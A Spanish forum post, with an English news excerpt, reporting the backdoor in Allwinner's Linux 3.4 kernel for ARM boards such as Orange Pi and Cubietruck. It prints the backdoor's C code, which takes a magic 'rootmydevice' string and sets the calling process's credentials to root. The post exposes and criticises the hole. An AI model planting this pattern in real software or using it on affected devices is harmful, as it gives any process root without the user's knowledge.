Allwinner acusada de introducir un backdoor en su versión de Linux

Allwinner acusada de introducir un backdoor en su versión de Linux -> cliquen acá

Si amigos, estamos hablando de la compañía china Allwinner, que en su versión personalizada del kernel para dispositivos con arquitectura ARM, presenta una puerta trasera que permite a cualquier aplicación que se está ejecutando adquirir privilegios de root, sin intervención del usuario.

Y además

Esto son algunos de los fabricantes a los que afectaría este problema según comentan en el foro de armbian: Orange Pi, NanoPi M1, SinoVoip M2, SinoVoip M3, Cuebitech Cubietruck y LinkSprite pcDuino8 Uno.

:fearful:

Lo que más me duele es la chapuza de código


	if(!strncmp("rootmydevice",(char*)buf,12)){
		cred = (struct cred *)__task_cred(current);
		cred->uid = 0;
		cred->gid = 0;
		cred->suid = 0;
		cred->euid = 0;
		cred->euid = 0;
		cred->egid = 0;
		cred->fsuid = 0;
		cred->fsgid = 0;
		printk("now you are root\n");
	}
2 Me gusta

Its Linux 3.4-based kernel code, on Github here, contains what looks to The Register like a debug mode the authors forgot to kill. Although it doesn’t appear to have made it into the mainstream kernel source, it was picked up by firmware builders for various gadgets using Allwinner’s chips.

fuente: